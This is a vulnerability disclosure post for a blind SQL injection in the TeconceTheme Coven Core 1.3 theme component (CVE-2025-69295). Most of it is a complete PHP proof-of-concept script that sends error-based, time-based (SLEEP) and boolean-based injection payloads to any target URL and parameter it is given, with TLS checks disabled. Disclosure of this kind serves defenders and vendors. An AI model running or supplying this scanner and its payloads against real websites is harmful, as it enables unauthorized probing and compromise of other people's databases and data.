=============================================================================================================================================
| # Title     : TeconceTheme Coven Core 1.3 Blind SQL Injection php Vulnerability                                                           |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
| # Vendor    : https://themeforest.net/user/teconcetheme                                                                                   |
=============================================================================================================================================

[+] Summary    : A Blind SQL Injection vulnerability exists in TeconceTheme Coven Core due to improper sanitization of user-supplied input in a GET parameter.

The vulnerability allows remote attackers to manipulate backend SQL queries via crafted payloads. Depending on server configuration and database behavior, this issue may be exploited using:

Error-based SQL Injection

Time-based Blind SQL Injection

Boolean-based Blind SQL Injection

Successful exploitation could allow attackers to:

Extract sensitive database information

Enumerate database structure

Bypass authentication mechanisms

Potentially escalate to full database compromise

The vulnerability is remotely exploitable without authentication if the affected parameter is publicly accessible.
				 
[+] POC   :  

<?php

error_reporting(0);
set_time_limit(0);

function banner() {
    echo "\n";
    echo "========================================================\n";
    echo "   CVE-2025-69295 Blind SQLi Scanner (PHP) by indoushka\n";
    echo "=========================================================\n\n";
}

function http_request($url, $timeout = 5) {

    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
    curl_setopt($ch, CURLOPT_TIMEOUT, $timeout);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0");

    $response = curl_exec($ch);
    $error = curl_error($ch);
    curl_close($ch);

    if ($error) {
        return false;
    }

    return $response;
}

function connect_target($target, $timeout) {

    $urls = [];

    if (strpos($target, "http") === 0) {
        $urls[] = $target;
    } else {
        $urls[] = "https://" . $target;
        $urls[] = "http://" . $target;
    }

    foreach ($urls as $url) {
        echo "[+] Trying: $url\n";
        $response = http_request($url, $timeout);
        if ($response !== false) {
            echo "[] Connected: $url\n";
            return $url;
        }
    }

    return false;
}

$ERROR_PAYLOADS = ["'", "\"", "'--", "' OR '1'='1"];
$TIME_PAYLOAD = "' OR SLEEP(5)-- ";
$BOOLEAN_TRUE = "' OR 1=1-- ";
$BOOLEAN_FALSE = "' OR 1=2-- ";

function error_based_test($url, $param, $timeout, $payloads) {

    $errors = ["sql syntax", "mysql", "warning", "database error", "sql error"];

    foreach ($payloads as $payload) {

        $test_url = $url . "?" . $param . "=" . urlencode($payload);
        $response = http_request($test_url, $timeout);

        if ($response) {
            foreach ($errors as $error) {
                if (stripos($response, $error) !== false) {
                    return true;
                }
            }
        }
    }

    return false;
}

function time_based_test($url, $param, $timeout, $payload) {

    $test_url = $url . "?" . $param . "=" . urlencode($payload);

    $start = microtime(true);
    http_request($test_url, $timeout + 6);
    $end = microtime(true);

    if (($end - $start) >= 5) {
        return true;
    }

    return false;
}

function boolean_based_test($url, $param, $timeout, $true_payload, $false_payload) {

    $true_url = $url . "?" . $param . "=" . urlencode($true_payload);
    $false_url = $url . "?" . $param . "=" . urlencode($false_payload);

    $r1 = http_request($true_url, $timeout);
    $r2 = http_request($false_url, $timeout);

    if ($r1 && $r2) {
        if (strlen($r1) != strlen($r2)) {
            return true;
        }
    }

    return false;
}

function scan($target, $param, $timeout) {

    global $ERROR_PAYLOADS, $TIME_PAYLOAD, $BOOLEAN_TRUE, $BOOLEAN_FALSE;

    $base_url = connect_target($target, $timeout);

    if (!$base_url) {
        echo "[!] Target unreachable\n";
        return;
    }

    $vulnerable = false;

    echo "\n[*] Testing Error-based SQLi...\n";
    if (error_based_test($base_url, $param, $timeout, $ERROR_PAYLOADS)) {
        echo "[] Error-based SQL Injection detected\n";
        $vulnerable = true;
    } else {
        echo "[] No Error-based SQL Injection\n";
    }

    echo "\n[*] Testing Time-based SQLi...\n";
    if (time_based_test($base_url, $param, $timeout, $TIME_PAYLOAD)) {
        echo "[] Time-based SQL Injection detected\n";
        $vulnerable = true;
    } else {
        echo "[] No Time-based SQL Injection\n";
    }

    echo "\n[*] Testing Boolean-based SQLi...\n";
    if (boolean_based_test($base_url, $param, $timeout, $BOOLEAN_TRUE, $BOOLEAN_FALSE)) {
        echo "[] Boolean-based SQL Injection detected\n";
        $vulnerable = true;
    } else {
        echo "[] No Boolean-based SQL Injection\n";
    }

    echo "\n=====================================\n";

    if ($vulnerable) {
        echo "[!!!] RESULT: TARGET IS VULNERABLE TO CVE-2025-69295\n";
    } else {
        echo "[] RESULT: TARGET NOT VULNERABLE\n";
    }

    echo "=====================================\n";
}

banner();

$options = getopt("t:p:", ["target:", "param:", "timeout:"]);

$target = $options['t'] ?? $options['target'] ?? null;
$param = $options['p'] ?? $options['param'] ?? null;
$timeout = $options['timeout'] ?? 5;

if (!$target || !$param) {
    echo "Usage:\n";
    echo "php scanner.php -t http://target.com/page.php -p id --timeout=5\n";
    exit;
}

scan($target, $param, $timeout);

?>


Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================